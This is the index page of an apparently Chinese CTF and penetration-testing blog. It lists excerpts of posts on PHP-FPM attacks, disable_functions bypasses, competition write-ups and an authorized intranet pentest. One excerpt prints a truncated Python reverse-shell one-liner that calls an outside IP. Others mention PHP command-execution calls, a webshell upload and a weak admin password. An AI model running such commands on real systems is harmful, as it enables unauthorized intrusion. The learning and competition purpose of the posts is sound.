Dr0n's blog
  • 首页
  • 时间轴
  • 分类
  • 标签
  • 关于
  • 友链
  • ctfd

php-fpm攻击总结

PHP-FPM 是 FastCGI 的一个具体实现(协议解析器) Nginx等服务器中间件将用户请求按照fastcgi的规则打包好通过TCP传给FPM,然后FPM按照fastcgi的协议将TCP流解析成真正的数据 举个例子,用户访问http://127.0.0.1/index.php?a=1&b=2,如果web目录是/var/www/html,那么Nginx会
2024-07-22
总结
#总结 #php-fpm #中间件

绕过disable_fuctions的方法总结

常规函数函数绕过123456789101112131415161718<?php//exececho exec('whoami');//shell_exececho shell_exec('whoami');//systemsystem('whoami');//passthrupassthru("whoami")
2024-07-17
总结
#总结 #php #bypass #disable_fuctions #pwn

反弹shell

反弹shell的常用命令 python1python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("47.99.77.52",8888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(
2024-07-15
总结
#总结 #反弹shell

第十七届全国大学生信息安全竞赛-华东南分区赛

1签到+4web+4pwn web-welcome签到,Ctrl+U web-submitbreak文件上传,有对内容检测,使用短标签绕过 fix添加黑名单 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?php// $path = "./uploads"
2024-06-25
wp
#wp #ciscn #awdp #2024

春秋云境 GreatWall(第一届长城杯半决赛渗透题)

ThinkPHP (172.28.23.17)先扫描端口,发现开放了两个web服务 8080是一个后台登录框,版本是ThinkPHP V5.0.23 直接用tp5的nday打 写入shell后根目录有flag1 然后上传fscan开始扫内网 1234567891011121: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue s
2024-06-10
内网
#内网渗透 #春秋云境 #多维挑战

2024宁波市第七届网络安全大赛决赛 awd wp

pwn攻击 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465from pwn import *context.arch='amd64'import sysdef add(ind,size
2024-05-25
wp
#awd #宁波

第一届长城杯信息安全铁人三项赛决赛 取证溯源 wp

取证溯源 1、您的同事李白在运维一台部署了移动应用服务端的linux服务器时发现了异常,好像被黑客攻击了。小李通过简单分析,发现可能是由于公司的移动应用和其服务端程序都存在安全问题导致的。小李将当天可能与攻击相关的流量导出,并与移动应用一起打包压缩,你可以下载分析,也可以登录此服务器进行攻击溯源、排查等,提供了SSH和VNC访问的方式供您和您的团队进行分析取证。 关卡01: 100 分 关卡描述
2024-05-24
wp
#长城杯 #取证

第十七届全国大学生信息安全竞赛-创新实践能力赛初赛

miscPower Trajectory Diagram先将npz解压,然后将功耗转成图片分析 12345678910from PIL import Imageimport numpy as npind=np.load("index.npy")p=np.load("trace.npy")for j,a in enumerate(p): img=Imag
2024-05-20
wp
#wp #ciscn #2024

第一届长城杯信息安全铁人三项赛半决赛(第三赛区)AWD WP

rank: 6 tomcat漏洞1-文件上传getshelldata.sql泄露教师账号密码 1INSERT INTO `teacher` VALUES ('admin','admin1','','','admin@qq.com'); 登录后台login.jsp 后台用户上传头像处存在任意文件上传
2024-04-21
wp
#awd #长城杯

xx市学校食堂原辅材料统一配送管理系统

2023.8月合法授权进行渗透测试,现已修复 外网后台发现后直接就是一个弱口令 admin/7654321 测试后发现公告处存在任意文件上传 上传一个jsp 冰蝎连接后直接拿下 内网接着进行当前主机的信息收集 软件:火绒,todesk,360浏览器等OS:Microsoft Windows Server 2016 Standard网段:10.77.0.0/24 远
2024-02-23
内网
#内网渗透 #实战
1234…10

搜索

Hexo Fluid
载入天数... 载入时分秒...
总访问量 次 总访客数 人
浙ICP备2022002247号-2